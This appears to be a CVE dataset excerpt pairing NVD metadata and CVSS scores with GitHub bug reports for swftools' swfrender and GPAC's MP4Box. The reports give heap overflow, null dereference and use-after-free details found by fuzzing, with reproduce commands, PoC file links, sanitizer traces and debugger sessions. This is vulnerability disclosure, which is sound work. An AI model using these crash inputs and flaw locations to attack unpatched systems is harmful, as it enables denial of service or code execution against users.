[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:-:*:*:*:*:*:*:*", "matchCriteriaId": "05E27E60-6223-457B-BF90-E747C9C5DEE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/185
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# swfrender ## heap buffer overflow ### command to reproduce `./swfrender [sample file] -o /dev/null` ### crash sample [id8_heap-buffer-overflow_swf_DefineLosslessBitsTagToImage.zip](https://github.com/matthiaskramm/swftools/files/9036326/id8_heap-buffer-overflow_swf_DefineLosslessBitsTagToImage.zip) ### crash info ``` ==20010==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6110000007fc at pc 0x000000509052 bp 0x7ffd07ab6370 sp 0x7ffd07ab6368 READ of size 4 at 0x6110000007fc thread T0 #0 0x509051 in swf_DefineLosslessBitsTagToImage /home/bupt/Desktop/swftools/lib/modules/swfbits.c:1037:16 #1 0x50aacb in swf_ExtractImage /home/bupt/Desktop/swftools/lib/modules/swfbits.c:1221:9 #2 0x4fcf44 in extractDefinitions /home/bupt/Desktop/swftools/lib/readers/swf.c:405:18 #3 0x4fcf44 in swf_open /home/bupt/Desktop/swftools/lib/readers/swf.c:736:18 #4 0x4f6846 in main /home/bupt/Desktop/swftools/src/swfrender.c:174:29 #5 0x7fb150d57c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x41d4c9 in _start (/home/bupt/Desktop/swftools/build/bin/swfrender+0x41d4c9) 0x6110000007fc is located 764 bytes to the right of 256-byte region [0x611000000400,0x611000000500) allocated by thread T0 here: #0 0x4afa90 in malloc /home/bupt/桌面/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x62146e in rfx_alloc /home/bupt/Desktop/swftools/lib/mem.c:30:9 #2 0x50aacb in swf_ExtractImage /home/bupt/Desktop/swftools/lib/modules/swfbits.c:1221:9 #3 0x4f6846 in main /home/bupt/Desktop/swftools/src/swfrender.c:174:29 #4 0x7fb150d57c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/modules/swfbits.c:1037:16 in swf_DefineLosslessBitsTagToImage Shadow bytes around the buggy address: 0x0c227fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c227fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c227fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==20010==ABORTING ``` ----------------------- ## SEGV ### command to reproduce `./swfrender [sample file] -o /dev/null` ### crash sample [id58_SEGV_extractFrame.zip](https://github.com/matthiaskramm/swftools/files/9036327/id58_SEGV_extractFrame.zip) ### crash info ``` ==20817==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x0000004f9f76 bp 0x0c1600000664 sp 0x7fffe97402a0 T0) ==20817==The signal is caused by a READ memory access. ==20817==Hint: address points to the zero page. #0 0x4f9f76 in extractFrame /home/bupt/Desktop/swftools/lib/readers/swf.c:458:49 #1 0x4f981c in swfpage_render /home/bupt/Desktop/swftools/lib/readers/swf.c:637:23 #2 0x4f7398 in main /home/bupt/Desktop/swftools/src/swfrender.c:218:17 #3 0x7f720636dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41d4c9 in _start (/home/bupt/Desktop/swftools/build/bin/swfrender+0x41d4c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/readers/swf.c:458:49 in extractFrame ==20817==ABORTING ```
bug found in swfrender
https://api.github.com/repos/swftools/swftools/issues/185/comments
0
2022-07-04T04:15:24Z
2022-07-04T04:15:24Z
https://github.com/swftools/swftools/issues/185
1,292,592,670
185
CVE-2022-36186
2022-08-17T15:15:08.480
A Null Pointer dereference vulnerability exists in GPAC 2.1-DEV-revUNKNOWN-master via the function gf_filter_pid_set_property_full () at filter_core/filter_pid.c:5250,which causes a Denial of Service (DoS). This vulnerability was fixed in commit b43f9d1.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.1:dev:*:*:*:*:*:*", "matchCriteriaId": "2963671B-FA29-45DB-80B0-92F9E55F5159", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2223
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Description:** `A crash happened on MP4Box(GPAC version 2.1-DEV-revUNKNOWN-master) due to a null pointer dereference vulnerability in gf_filter_pid_set_property_full function (filter_core/filter_pid.c:5250) . ` **MP4Box version** ``` ./MP4Box -version MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **poc** [poc.zip](https://github.com/gpac/gpac/files/9062544/poc.zip) **command** `./MP4Box -info poc` **crash output** ``` [AVC|H264] Warning: Error parsing NAL unit filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid' ``` **gdb output** ``` pwndbg> r Starting program: /home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box -info ../../../test/segv2/poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". [AVC|H264] Warning: Error parsing NAL unit filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid' [Inferior 1 (process 2239153) exited with code 01] pwndbg> b filter_pid.c:5250 Breakpoint 1 at 0x7ffff4b829f6: filter_pid.c:5250. (6 locations) pwndbg> r Starting program: /home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box -info ../../../test/segv2/poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Breakpoint 1, gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9150, dyn_name=0x0, prop_name=0x0, prop_4cc=1347244884, pid=0x613000000040) at filter_core/filter_pid.c:5301 5301 return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE); LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── RAX 0x0 RBX 0x7ffffffe8f50 ◂— 0x41b58ab3 RCX 0xfffffffd22a ◂— 0x0 RDX 0x7ffffffe9150 ◂— 0x2 RDI 0x613000000040 ◂— 0x613000000040 /* '@' */ RSI 0x504d5354 R8 0x0 R9 0x7ffff58cb4f0 (global_log_tools+496) ◂— 0x2 R10 0x7ffff24ab3f1 ◂— 'gf_filter_pid_set_property' R11 0x7ffff4b84110 (gf_filter_pid_set_property) ◂— endbr64 R12 0x613000000040 ◂— 0x613000000040 /* '@' */ R13 0x7ffffffe9150 ◂— 0x2 R14 0x504d5354 R15 0xfffffffd1ea ◂— 0x0 RBP 0x7ffffffe9060 —▸ 0x7ffffffe9380 —▸ 0x7ffffffea0d0 —▸ 0x7ffffffea170 —▸ 0x7ffffffea280 ◂— ... RSP 0x7ffffffe8f30 ◂— 0x0 RIP 0x7ffff4b841c6 (gf_filter_pid_set_property+182) ◂— test r12, r12 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ► 0x7ffff4b841c6 <gf_filter_pid_set_property+182> test r12, r12 0x7ffff4b841c9 <gf_filter_pid_set_property+185> je gf_filter_pid_set_property+1477 <gf_filter_pid_set_property+1477> 0x7ffff4b841cf <gf_filter_pid_set_property+191> test r12b, 7 0x7ffff4b841d3 <gf_filter_pid_set_property+195> jne gf_filter_pid_set_property+1477 <gf_filter_pid_set_property+1477> 0x7ffff4b841d9 <gf_filter_pid_set_property+201> mov rax, r12 0x7ffff4b841dc <gf_filter_pid_set_property+204> shr rax, 3 0x7ffff4b841e0 <gf_filter_pid_set_property+208> cmp byte ptr [rax + 0x7fff8000], 0 0x7ffff4b841e7 <gf_filter_pid_set_property+215> jne gf_filter_pid_set_property+1447 <gf_filter_pid_set_property+1447> 0x7ffff4b841ed <gf_filter_pid_set_property+221> cmp r12, qword ptr [r12] 0x7ffff4b841f1 <gf_filter_pid_set_property+225> jne gf_filter_pid_set_property+1016 <gf_filter_pid_set_property+1016> 0x7ffff4b841f7 <gf_filter_pid_set_property+231> mov esi, r14d ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── In file: /home/fuzz/gpac2.1/gpac/src/filter_core/filter_pid.c 5296 5297 GF_EXPORT 5298 GF_Err gf_filter_pid_set_property(GF_FilterPid *pid, u32 prop_4cc, const GF_PropertyValue *value) 5299 { 5300 if (!prop_4cc) return GF_BAD_PARAM; ► 5301 return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE); 5302 } 5303 5304 GF_EXPORT 5305 GF_Err gf_filter_pid_set_property_str(GF_FilterPid *pid, const char *name, const GF_PropertyValue *value) 5306 { ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 00:0000│ rsp 0x7ffffffe8f30 ◂— 0x0 01:0008│ 0x7ffffffe8f38 ◂— 0x0 02:0010│ 0x7ffffffe8f40 —▸ 0x7ffffffe9030 —▸ 0x7ffff54af2c0 ◂— 0x6372636170672e /* '.gpacrc' */ 03:0018│ 0x7ffffffe8f48 —▸ 0x7ffffffe8f50 ◂— 0x41b58ab3 04:0020│ rbx 0x7ffffffe8f50 ◂— 0x41b58ab3 05:0028│ 0x7ffffffe8f58 —▸ 0x7ffff5640eff ◂— '1 48 100 11 szName:5290' 06:0030│ 0x7ffffffe8f60 —▸ 0x7ffff4b84110 (gf_filter_pid_set_property) ◂— endbr64 07:0038│ 0x7ffffffe8f68 —▸ 0x618000000c80 —▸ 0x7ffff6de03e0 (FileInRegister) —▸ 0x7ffff56a6580 ◂— 0x6e6966 /* 'fin' */ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ► f 0 0x7ffff4b841c6 gf_filter_pid_set_property+182 f 1 0x7ffff4b841c6 gf_filter_pid_set_property+182 f 2 0x7ffff4c06993 gf_filter_pid_raw_new+595 f 3 0x7ffff4dc30b1 filein_process+2721 f 4 0x7ffff4c0eb6d gf_filter_process_task+3581 f 5 0x7ffff4bd4953 gf_fs_thread_proc+2275 f 6 0x7ffff4be0c67 gf_fs_run+455 f 7 0x7ffff462a677 gf_media_import+10263 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9150, dyn_name=0x0, prop_name=0x0, prop_4cc=1347244884, pid=0x613000000040) at filter_core/filter_pid.c:5301 #1 gf_filter_pid_set_property (pid=pid@entry=0x613000000040, prop_4cc=prop_4cc@entry=1347244884, value=0x7ffffffe9150) at filter_core/filter_pid.c:5301 #2 0x00007ffff4c06993 in gf_filter_pid_raw_new (filter=filter@entry=0x618000000c80, url=0x603000000f40 "../../../test/segv2/poc", local_file=<optimized out>, mime_type=<optimized out>, fext=<optimized out>, probe_data=<optimized out>, probe_size=<optimized out>, trust_mime=<optimized out>, out_pid=<optimized out>) at filter_core/filter.c:3891 #3 0x00007ffff4dc30b1 in filein_process (filter=<optimized out>) at filters/in_file.c:481 #4 0x00007ffff4c0eb6d in gf_filter_process_task (task=0x607000000b10) at filter_core/filter.c:2639 #5 0x00007ffff4bd4953 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x616000000110) at filter_core/filter_session.c:1857 #6 0x00007ffff4be0c67 in gf_fs_run (fsess=fsess@entry=0x616000000080) at filter_core/filter_session.c:2118 #7 0x00007ffff462a677 in gf_media_import (importer=importer@entry=0x7ffffffeaa50) at media_tools/media_import.c:1226 #8 0x0000555555651a12 in convert_file_info (inName=<optimized out>, track_id=0x555555764fb0 <info_track_id>) at fileimport.c:130 #9 0x000055555562279f in mp4box_main (argc=<optimized out>, argv=<optimized out>) at mp4box.c:6265 #10 0x00007ffff1949083 in __libc_start_main (main=0x5555555f6a00 <main>, argc=3, argv=0x7fffffffe488, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe478) at ../csu/libc-start.c:308 #11 0x00005555555f6afe in _start () at mp4box.c:6811 pwndbg> p pid $2 = (GF_FilterPid *) 0x613000000040 pwndbg> c Continuing. [AVC|H264] Warning: Error parsing NAL unit Breakpoint 1, gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9810, dyn_name=0x0, prop_name=0x0, prop_4cc=1146050121, pid=0x0) at filter_core/filter_pid.c:5301 5301 return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE); LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ............ until....... pwndbg> p pid $3 = (GF_FilterPid *) 0x0 pwndbg> i b Num Type Disp Enb Address What 1 breakpoint keep y <MULTIPLE> breakpoint already hit 9 times 1.1 y 0x00007ffff4b829f6 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.2 y 0x00007ffff4b8314e in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.3 y 0x00007ffff4b834d1 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.4 y 0x00007ffff4b8393e in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.5 y 0x00007ffff4b83cc1 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.6 y 0x00007ffff4b841c6 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 pwndbg> n filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid' [Inferior 1 (process 2239158) exited with code 01] ``` **source code** ``` 5246 static GF_Err gf_filter_pid_set_property_full(GF_FilterPid *pid, u32 prop_4cc, const char *prop_name, char *dyn_name, const GF_PropertyValue *value, Bool is_info) 5247 { 5248 GF_PropertyMap *map; 5249 const GF_PropertyValue *oldp; 5250 if (PID_IS_INPUT(pid)) { //**here**// 5251 GF_LOG(GF_LOG_ERROR, GF_LOG_FILTER, ("Attempt to write property on input PID in filter %s - ignoring\n", pid->filter->name)); 5252 return GF_BAD_PARAM; 5253 } ```
A NULL pointer dereference in gf_filter_pid_set_property_full
https://api.github.com/repos/gpac/gpac/issues/2223/comments
0
2022-07-07T10:26:55Z
2022-07-12T17:13:11Z
https://github.com/gpac/gpac/issues/2223
1,297,164,642
2,223
CVE-2022-36190
2022-08-17T15:15:08.543
GPAC mp4box 2.1-DEV-revUNKNOWN-master has a use-after-free vulnerability in function gf_isom_dovi_config_get. This vulnerability was fixed in commit fef6242.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2220" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2220
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Description** `Heap use after free in fuction gf_isom_dovi_config_get located in isomedia/avc_ext.c:2490` **System info** `ubuntu 20.04 lts` **version info:** ``` ./MP4Box -version MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **compile** ``` ./configure --enable-sanitizer make ``` **crash command:** `./MP4Box -info poc` **poc :** [poc.zip](https://github.com/gpac/gpac/files/9051242/poc.zip) **Crash output:** ``` [iso file] Unknown box type mp4u in parent stsd [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Unknown box type drzf in parent dinf [iso file] Missing dref box in dinf [iso file] Incomplete box mdat - start 11495 size 853076 [iso file] Incomplete file while reading for dump - aborting parsing # Movie Info - 5 tracks - TimeScale 90000 Duration 00:00:22.839 (recomputed 00:00:22.848) Fragmented: no Progressive (moov before mdat) Major Brand isom - version 1 - compatible brands: Created: GMT Wed Sep 14 06:08:31 2078 Modified: GMT Wed Sep 14 06:08:33 2078 File has root IOD (96 bytes) Scene PL 0xff - Graphics PL 0xff - OD PL 0xff Visual PL: Simple Profile @ Level 1 (0x01) Audio PL: High Quality Audio Profile @ Level 2 (0x0f) 1 UDTA types: hnti: # Track 1 Info - ID 1 - TimeScale 90000 Media Duration 00:00:22.800 Track flags: Enabled Media Info: Language "Undetermined (und)" - Type "vide:mp4u" - 342 samples Visual Sample Entry Info: width=176 height=144 (depth=24 bits) Visual Track layout: x=0 y=0 width=176 height=144 ================================================================= ==2234976==ERROR: AddressSanitizer: heap-use-after-free on address 0x60f000000130 at pc 0x7fbba822fbc0 bp 0x7ffe87b46740 sp 0x7ffe87b46730 READ of size 8 at 0x60f000000130 thread T0 #0 0x7fbba822fbbf in gf_isom_dovi_config_get isomedia/avc_ext.c:2490 #1 0x55f3db03107a in DumpTrackInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:2862 #2 0x55f3db03ea17 in DumpMovieInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:3994 #3 0x55f3db012ad0 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6367 #4 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308 #5 0x55f3dafe7afd in _start (/home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box+0xa2afd) 0x60f000000130 is located 0 bytes inside of 168-byte region [0x60f000000130,0x60f0000001d8) freed by thread T0 here: #0 0x7fbbab63440f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 #1 0x7fbba825252d in unkn_box_read isomedia/box_code_base.c:793 #2 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #3 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #4 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #5 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #6 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #7 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #8 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #9 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #10 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #11 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #12 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #13 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #14 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #15 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #16 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #17 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #18 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #19 0x7fbba8302a35 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #20 0x7fbba832babc in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:373 #21 0x7fbba8331c2f in gf_isom_parse_movie_boxes isomedia/isom_intern.c:860 #22 0x7fbba8331c2f in gf_isom_open_file isomedia/isom_intern.c:980 #23 0x55f3db00c549 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6181 #24 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308 previously allocated by thread T0 here: #0 0x7fbbab634808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x7fbba82521ef in unkn_box_read isomedia/box_code_base.c:768 #2 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #3 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #4 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #5 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #6 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #7 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #8 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #9 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #10 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #11 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #12 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #13 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #14 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #15 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #16 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #17 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #18 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #19 0x7fbba8302a35 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #20 0x7fbba832babc in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:373 #21 0x7fbba8331c2f in gf_isom_parse_movie_boxes isomedia/isom_intern.c:860 #22 0x7fbba8331c2f in gf_isom_open_file isomedia/isom_intern.c:980 #23 0x55f3db00c549 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6181 #24 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-use-after-free isomedia/avc_ext.c:2490 in gf_isom_dovi_config_get Shadow bytes around the buggy address: 0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa =>0x0c1e7fff8020: fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd 0x0c1e7fff8030: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa 0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2234976==ABORTING ``` **Impact** can cause a program to crash, use unexpected values, or execute code. Occurrences: avc_ext.c:2490 ps: this test was still based on the newest mp4box+asan. The bug happened in avc_ext.c:2490 which was the same location with the other issue i submitted (https://github.com/gpac/gpac/issues/2218). Maybe asan mistakenly reports "heap-use-after-free" instead of "heap-buffer-overflow". Pls check it again.
Heap Use After Free in function gf_isom_dovi_config_get
https://api.github.com/repos/gpac/gpac/issues/2220/comments
1
2022-07-06T03:36:02Z
2022-07-12T17:13:50Z
https://github.com/gpac/gpac/issues/2220
1,295,074,577
2,220
CVE-2022-36191
2022-08-17T16:15:07.920
